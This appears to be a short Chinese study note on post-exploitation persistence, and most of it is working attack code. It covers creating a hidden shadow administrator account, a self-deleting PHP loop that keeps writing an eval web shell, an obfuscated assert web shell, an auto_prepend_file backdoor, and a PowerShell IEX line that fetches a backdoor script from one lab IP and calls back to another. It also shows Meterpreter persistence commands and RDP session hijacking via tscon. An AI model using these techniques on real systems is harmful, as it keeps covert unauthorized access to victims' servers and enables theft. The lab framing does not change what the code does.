0x00:简介
何为“后渗透”?就是获取到受害者服务器的权限后,再继续对受害者服务器进行长期攻击或者信息获取的一种持续性手段。常见的手段有,后门、影子账户、会话劫持等等。
0x01:实验
一、影子账户
net user luomiweixiong$ /add
net user
三、反弹加入自启(鸡肋)
1、NC反弹
2、Bash反弹
3、perl反弹
4、Python反弹
5、PHP反弹
6、等等
四、隐藏后门文件
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");
$b=array_keys($a)[0];
eval($b);?>');
sleep(8);
}
?>
auto_prepend_file=luomiweixiong.gif
<!–?php $a = “a”.”s”.”s”.”e”.”r”.”t”;$a($_POST[“kk”]); ?–>
powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"
run persistence -U -i 12 -p 6666 -r 192.168.124.14
run metsvc -A
query user
sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"
net start sesshijack
0x02:题外话
维护权限还有很多种方法,我这里只是举几个栗子🌰。
学生不才,总结不精,望良师指导